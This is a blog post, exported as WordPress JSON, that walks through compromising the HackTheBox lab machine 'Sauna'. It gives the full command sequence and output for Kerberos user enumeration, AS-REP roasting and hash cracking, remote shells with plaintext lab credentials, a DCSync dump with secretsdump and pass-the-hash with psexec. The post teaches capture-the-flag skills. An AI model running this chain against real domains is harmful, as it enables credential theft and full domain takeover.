{"id":61,"date":"2020-11-03T01:06:49","date_gmt":"2020-11-03T01:06:49","guid":{"rendered":"https:\/\/dextersec.xyz\/?p=61"},"modified":"2020-11-20T14:00:13","modified_gmt":"2020-11-20T14:00:13","slug":"active-directory-101-sauna","status":"publish","type":"post","link":"https:\/\/dextersec.xyz\/?p=61","title":{"rendered":"Active Directory 101: Sauna"},"content":{"rendered":"\n

Introduction<\/strong><\/h2>\n\n\n\n

For my third machine in the Hackthebox AD 101 track, I\u2019ll be pwning Sauna. Sauna is an easy active directory machine that teaches the basics of ASREPROASTING and Domain Replication Attacks . The attack path to domain admin wasn’t complicated and was a good test of how much I’ve learned so far. Initial access was achieved by obtaining and cracking the TGT of a non-preauthenticated user. Upon discovery and compromise of a user with DC Sync rights I was able to escalate privileges by dumping and passing the NTLM hash of the domain administrator.<\/p>\n\n\n\n\n\n\n\n

Reconnaissance<\/strong><\/h2>\n\n\n\n

New tool alert!!<\/p>\n\n\n\n

I’ve know rust-scan<\/a> for a while now and thought to give it a try for this machine, it turned out to be a pretty decent port scanning tool with twice the speed and accuracy of Nmap.<\/p>\n\n\n\n

First we rust scan against our target to discover open ports and and services<\/p>\n\n\n\n

rustscan --ulimit 5000 -a 10.10.10.175<\/code><\/pre>\n\n\n\n
–ulimit  –  Automatically ups the ULIMIT with the value you provided<\/p>\n\n\n\n
–addresses – A list of comma separated CIDRs, IPs, or hosts to be scanned<\/p>\n\n\n\n
\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n[~] Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-11-18 16:57 EST\n\nPORT      STATE SERVICE          REASON\n53\/tcp    open  domain           syn-ack ttl 127\n80\/tcp    open  http             syn-ack ttl 127\n88\/tcp    open  kerberos-sec     syn-ack ttl 127\n135\/tcp   open  msrpc            syn-ack ttl 127\n139\/tcp   open  netbios-ssn      syn-ack ttl 127\n389\/tcp   open  ldap             syn-ack ttl 127\n445\/tcp   open  microsoft-ds     syn-ack ttl 127\n464\/tcp   open  kpasswd5         syn-ack ttl 127\n593\/tcp   open  http-rpc-epmap   syn-ack ttl 127\n636\/tcp   open  ldapssl          syn-ack ttl 127\n3268\/tcp  open  globalcatLDAP    syn-ack ttl 127\n3269\/tcp  open  globalcatLDAPssl syn-ack ttl 127\n5985\/tcp  open  wsman            syn-ack ttl 127\n9389\/tcp  open  adws             syn-ack ttl 127\n\nRead data files from: \/usr\/bin\/..\/share\/nmap\nNmap done: 1 IP address (1 host up) scanned in 0.82 seconds\n           Raw packets sent: 24 (1.032KB) | Rcvd: 22 (960B)<\/code><\/pre>\n\n\n\n
Figure 1: Port-scanning  with RustScan<\/p>\n\n\n\n
RustScan completes a full TCP scan in less than 45 seconds.<\/p>\n\n\n\n
From the result  above we can gather the following:<\/p>\n\n\n\n
  1. Port 80 has HTTP service running.<\/li>
  2. Port 53 indicates that DNS is running on this machine<\/li>
  3. Port 88 is running the Kerberos authentication service<\/li>
  4. Ports 389 & 3628 have LDAP running<\/li>
  5. The host is a Domain Controller<\/li>
  6. LDAP provides us with the domain name egotisticalbank.local<\/li><\/ol>\n\n\n\n
    Enumeration<\/strong><\/h2>\n\n\n\n
    In enumerating this box the easiest attack vector would be through SMB, anonymous credentials worked with SMBclient but there were no accessible network shares, domain user enumeration with LDAP didn’t work also. Finally we probed port 88 (Kerberos) with kerbrute<\/a> (a tool for brute-forcing valid Active Directory accounts through Kerberos Pre-Authentication) and discovered  a valid user.<\/p>\n\n\n\n
    In enumerating kerberos with kerbrute, a word list of possible username is required, we can easily generate our custom word list by visiting the website being served by our target.  <\/p>\n\n\n\n
    \"\"
    Figure 2: The website provides us with possible domain users<\/figcaption><\/figure>\n\n\n\n
    Now we create a custom word list with the first initial and last name of each team member and pass it into kerbrute as an argument to discover non-preauthenticated users.<\/p>\n\n\n\n
    .\/kerbrute_linux_amd64 userenum userlist.txt --dc 10.10.10.175 -d egotisticalbank <\/code><\/pre>\n\n\n\n
    userenum<\/strong> Enumerates valid domain usernames via Kerberos<\/p>\n\n\n\n
    –dc<\/strong> Specifies the domain controller’s IP Address<\/p>\n\n\n\n
    -d<\/strong>  Specifies the domain<\/p>\n\n\n\n
       \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,< \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/                                        \n\nVersion: v1.0.3 (9dad6e1) - 11\/18\/20 - Ronnie Flathers @ropnop\n\n2020\/11\/18 11:50:01 >  Using KDC(s):\n2020\/11\/18 11:50:01 >   10.10.10.175:88\n\n2020\/11\/18 11:50:01 >  [+] VALID USERNAME:       fsmith@egotisticalbank\n\n<\/code><\/pre>\n\n\n\n
    Figure 3: Username enumeration with Kerbrute<\/p>\n\n\n\n
    Boom!! valid user found. we can proceed to the next stage of our attack. \ud83d\ude42<\/p>\n\n\n\n
    <\/p>\n\n\n\n
    Initial Access<\/strong><\/h2>\n\n\n\n
    Since we are working with windows active directory we can leverage on a technique called ASREPROASTING (i.e Authentication Server Response Roasting) to gain initial foothold on this machine. <\/p>\n\n\n\n
    The ASREPRoast attack looks for users without Kerberos pre-authentication enabled attribute (<\/strong>DONT_REQ_PREAUTH<\/em><\/strong><\/a>)<\/em><\/strong>.<\/p>\n\n\n\n
    This means  anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This message contains a chunk of data encrypted with the original user hash, derived from its password. Then, by leveraging this flaw, the hash could be cracked offline to obtain a valid password.<\/p>\n\n\n\n
    harmj0y<\/a> has an awesome article <\/a>that explains this attack in depth.<\/p>\n\n\n\n
    The GetUserSPNs binary from impacket suite is the tool of choice for this step.<\/p>\n\n\n\n
    If you don\u2019t have impacket installed simply run the command:<\/p>\n\n\n\n
    apt-get install python3-impacket<\/code><\/pre>\n\n\n\n
    Run the Impacket-GetNPUsers binary against fsmith<\/p>\n\n\n\n
    python3 GetNPUsers.py -no-pass egotistical\/fsmith -dc-ip 10.10.10.175 -request<\/code><\/pre>\n\n\n\n
    -request<\/strong> Requests TGT for users and output them in JtR\/hashcat format<\/p>\n\n\n\n
    dc-ip <\/strong>Specifies the domain controller’s IP Address<\/p>\n\n\n\n
    We get back the result<\/p>\n\n\n\n
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation\n\n[*] Getting TGT for fsmith\n$krb5asrep$23$fsmith@EGOTISTICALBANK:9ed62d0a4a1866441afbcb74c5ed1fa0$1df2ba2bdf83294cd28167a43df5ed9426f1551a3b28b2856f6bca20fc315c90ba944ecbd0bc0c254c817e456a5830ba0eadfb78c5f3301c77439ef2fb32975f83927b8085c812106b6c7e48f384b531642a13e9d69996b008bda62c5792cc81454a6fe461d25c81d5a323f5862d086a5a85f1f9e49839907c02dfa05399558871a33d1a13c891717ae5e8d56663d2a6db841f4732bc60a98a65907f14c835016c68d371556a0d7096d6b03576390beaf8b9db96cb7979ac52b57862b88d380a693eee8ad466ba80351b8ebebfef64db886782d5806e2cab1e6b46cc620fd1b6ba0190fe562e0defe27fb0a601a28b9b847fad74ce9bee61b5\n\n<\/code><\/pre>\n\n\n\n
    Figure 4: ASREPROASTING with GetNPUsers.py<\/p>\n\n\n\n
    Save the hash into a file and attempt cracking with john to obtain a password in plain text for fsmith.<\/p>\n\n\n\n
    john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hashes.txt<\/code><\/pre>\n\n\n\n
    root@kali:\/opt\/htb\/active_directory_101\/sauna# john --show asrep_hashes.txt \n$krb5asrep$23$fsmith@EGOTISTICALBANK:Thestrokes23\n\n1 password hash cracked, 0 left\n<\/code><\/pre>\n\n\n\n
    Figure 5: Plain-text password for the user fsmith<\/p>\n\n\n\n
    We got a plaintext password!<\/p>\n\n\n\n
    Port 5985 is open for Windows Remote Management, lets fire up evil-winrm to get remote access  on our  target .<\/p>\n\n\n\n
    evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23<\/code><\/pre>\n\n\n\n
    -i  <\/strong>IP Remote host IP or host name.<\/p>\n\n\n\n
    -U<\/strong> Username<\/p>\n\n\n\n
    -P <\/strong>Password<\/p>\n\n\n\n
    Evil-WinRM shell v2.3\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\FSmith\\Documents> whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name              SID\n====================== ==============================================\negotisticalbank\\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105\n<\/code><\/pre>\n\n\n\n
    <\/p>\n\n\n\n
    Post Compromise Enumeration<\/strong> & Local Privilege Escalation<\/strong><\/h2>\n\n\n\n
    We have successfully established initial foothold on the domain controller, let’s learn more about our environment with WinPEAS<\/a><\/p>\n\n\n\n
    Upload WinPEAS to our target.<\/p>\n\n\n\n
    upload winPEAS.exe<\/code><\/pre>\n\n\n\n
    *Evil-WinRM* PS C:\\Users\\FSmith\\Documents> upload winPEAS.exe\nInfo: Uploading winPEAS.exe to C:\\Users\\FSmith\\Documents\\winPEAS.exe\n\n                                                             \nData: 629416 bytes of 629416 bytes copied\n\nInfo: Upload successful!\n<\/code><\/pre>\n\n\n\n
    <\/p>\n\n\n\n
    Run WinPEAS to enumerate the domain controller for local privilege escalation vectors.<\/p>\n\n\n\n
    .\/winPEAS.exe<\/code><\/pre>\n\n\n\n
    *Evil-WinRM* PS C:\\Users\\FSmith\\Documents> .\/winPEAS.exe\n\n  [...]\n\n  [+] Home folders found\n    C:\\Users\\Administrator\n    C:\\Users\\All Users\n    C:\\Users\\Default\n    C:\\Users\\Default User\n    C:\\Users\\FSmith : FSmith [AllAccess]\n    C:\\Users\\Public\n    C:\\Users\\svc_loanmgr\n\n  [+] Looking for AutoLogon credentials\n    Some AutoLogon credentials were found!!\n    DefaultDomainName             :  35mEGOTISTICALBANK\n    DefaultUserName               :  35mEGOTISTICALBANK\\svc_loanmanager\n    DefaultPassword               :  Moneymakestheworldgoround!\n   [...]<\/code><\/pre>\n\n\n\n
    Autologon credentials found!! now we can logon to the domain controller as svc_loanmgr. <\/p>\n\n\n\n
    Note: “svc_loanmanager” didn’t work as a username, appartently its a default username and was most likely modified to harden the DC, we can confirm this by running the following command;<\/em><\/p>\n\n\n\n
    net user \/domain<\/code><\/pre>\n\n\n\n
    As we can see in the output, it’s svc_loanmgr and not svc_loanmanager that’s a domain user.<\/p>\n\n\n\n
    *Evil-WinRM* PS C:\\Users\\FSmith\\Documents> net user \/domain\n\nUser accounts for \\\\\n\n-------------------------------------------------------------------------------\nAdministrator            FSmith                   Guest\nHSmith                   krbtgt                   svc_loanmgr\nThe command completed with one or more errors.\n<\/code><\/pre>\n\n\n\n
    Now let’s logon with evil-winrm<\/p>\n\n\n\n
    evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!<\/code><\/pre>\n\n\n\n
    root@kali:\/opt\/htb\/active_directory_101\/sauna# evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!\n\nEvil-WinRM shell v2.3\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\svc_loanmgr\\Documents><\/code><\/pre>\n\n\n\n
    Privilege Escalation<\/strong><\/h2>\n\n\n\n
    Next, we’ll use BloodHound to easily identify highly complex attack paths. Invoke-aclscanner & Invoke-allchecks modules from Powerview also works for this purpose, however, BloodHound is my go to tool.<\/p>\n\n\n\n
    You can check out my detailed write-up on getting started with BloodHound here.<\/p>\n\n\n\n
    First upload and execute bloodhound’s data ingestor, SharpHound.exe on our target. The executable can be found here<\/a><\/p>\n\n\n\n
    Upload SharpHound<\/p>\n\n\n\n
    upload SharpHound.exe<\/code><\/pre>\n\n\n\n
    *Evil-WinRM* PS C:\\Users\\svc_loanmgr\\Documents> upload SharpHound.exe\nInfo: Uploading SharpHound.exe to C:\\Users\\svc_loanmgr\\Documents\\SharpHound.exe<\/code><\/pre>\n\n\n\n
    Run the executable<\/p>\n\n\n\n
    .\/SharpHound.exe<\/code><\/pre>\n\n\n\n
    *Evil-WinRM* PS C:\\Users\\svc_loanmgr\\Documents> .\/SharpHound.exe\n------------------------------------------------\nInitializing SharpHound at 8:39 PM on 11\/18\/2020\n------------------------------------------------\n\nResolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container\n\n[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL\n[+] Cache File Found! Loaded 92 Objects in cache\n\n[+] Pre-populating Domain Controller SIDS\nStatus: 0 objects finished (+0) -- Using 21 MB RAM\nStatus: 60 objects finished (+60 \u00ec)\/s -- Using 27 MB RAM\nEnumeration finished in 00:00:00.2771487\nCompressing data to .\\20201118203954_BloodHound.zip\nYou can upload this file directly to the UI\n\nSharpHound Enumeration Completed at 8:39 PM on 11\/18\/2020! Happy Graphing!\n<\/code><\/pre>\n\n\n\n
    Download the zip file to our attacking machine for analysis with the BloodHound GUI<\/p>\n\n\n\n
    \"\"
    Downloading the scan results for analysis<\/figcaption><\/figure>\n\n\n\n
    Before we start analyzing the data ingested by SharpHound, we need to fire up neo4j database and BloodHound on our attacking machine. find a detailed guide on how to install neo4j<\/a> here.<\/p>\n\n\n\n
     neo4j console<\/code><\/pre>\n\n\n\n
    initializing neo4j<\/p>\n\n\n\n
    root@kali:~# neo4j console\nDirectories in use:\n  home:         \/usr\/share\/neo4j\n  config:       \/usr\/share\/neo4j\/conf\n  logs:         \/usr\/share\/neo4j\/logs\n  plugins:      \/usr\/share\/neo4j\/plugins\n  import:       \/usr\/share\/neo4j\/import\n  data:         \/usr\/share\/neo4j\/data\n  certificates: \/usr\/share\/neo4j\/certificates\n  run:          \/usr\/share\/neo4j\/run\nStarting Neo4j.\nWARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.\nPicked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\n2020-11-18 20:33:12.885+0000 INFO  ======== Neo4j 4.0.7 ========\n2020-11-18 20:33:12.905+0000 INFO  Starting...\n<\/code><\/pre>\n\n\n\n
    bloodhound<\/code><\/pre>\n\n\n\n
    initializing BloodHound<\/p>\n\n\n\n
    root@kali:~# bloodhound\n(node:1837) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.<\/code><\/pre>\n\n\n\n
    Login using the credentials you created while installing neo4j, and upload the zipped file to bloodhound.<\/p>\n\n\n\n
    \"\"
    Login to BloodHound<\/figcaption><\/figure>\n\n\n\n
    \"\"
    Uploading the zipped file for analysis with BloodHound<\/figcaption><\/figure>\n\n\n\n
    In the Bloodhound Queries <\/em>tab, select \u201cFind Principals with DCSync Rights<\/em>\u201d. This graphs all users on the domain with domain replication permissions.<\/p>\n\n\n\n
    \"\"
    Querying for users with DCSync Rights<\/figcaption><\/figure>\n\n\n\n
    The resulting query should look something like this.<\/p>\n\n\n\n
    \"\"
    Compromised user account svc_loanmgr has DCSync rights to the domain<\/figcaption><\/figure>\n\n\n\n
    We discover that SVC_LOANMGR has GetChanges & GetChangesAll permission on the domain.<\/p>\n\n\n\n
    What does this imply:<\/p>\n\n\n\n
    1. The combination of DS-Replication-GetChanges and DS-Replication-GetChangesall Permissions  grants us the ability to launch to a DCSYNC attack.<\/li><\/ol>\n\n\n\n
      Intermission: A detailed breakdown of these permissions and abuse information can be obtained by navigating to the help option on BloodHound<\/code><\/pre>\n\n\n\n
      Right click on “GetChanges” > Select “? Help”<\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      \"\"
      Detailed information about the Get-Changes Privilege<\/figcaption><\/figure>\n\n\n\n
      Now back to becoming domain admin…<\/strong><\/h2>\n\n\n\n
      Finally, to exploit loanmgr’s domain replication privilege, we run impacket-secretsdump on our attacking machine to obtain NTLM hashes for all users, then pass the administrator’s hash with psexec to obtain a privileged shell.<\/p>\n\n\n\n
      impacket-secretsdump \"egotistical.local\/svc_loanmgr:Moneymakestheworldgoround!\"@10.10.10.175<\/code><\/pre>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      Pass the domain administrator’s hash using psexec.py to obtain a privileged shell.<\/p>\n\n\n\n
      python3 psexec.py -hashes  egotistical.local\/administrator@10.10.10.175<\/code><\/pre>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      Domain Admin is officially pwned!!<\/p>\n\n\n
      active directory<\/a>\ncybersecurity<\/a>\ncybersecurity careers<\/a>\nethical hacking<\/a>\nhacking<\/a>\nhackthebox<\/a>\nkerberoasting<\/a>\nwriteup<\/a><\/p>\n\n\n
      <\/p>\n","protected":false},"excerpt":{"rendered":"
      Introduction For my third machine in the Hackthebox AD 101 track, I\u2019ll be pwning Sauna. Sauna is an easy active directory machine that teaches the basics of ASREPROASTING and Domain Replication Attacks . The attack path to domain admin wasn’t complicated and was a good test of how much I’ve learned so far. Initial access […]<\/p>\n","protected":false},"author":1,"featured_media":62,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,9],"tags":[4,5,3,6,7],"class_list":["post-61","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-active-directory-101","category-walkthroughs","tag-active-directory","tag-hacking","tag-hackthebox","tag-kerberoasting","tag-writeup"],"_links":{"self":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts\/61"}],"collection":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=61"}],"version-history":[{"count":18,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts\/61\/revisions"}],"predecessor-version":[{"id":388,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts\/61\/revisions\/388"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/media\/62"}],"wp:attachment":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=61"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=61"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=61"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}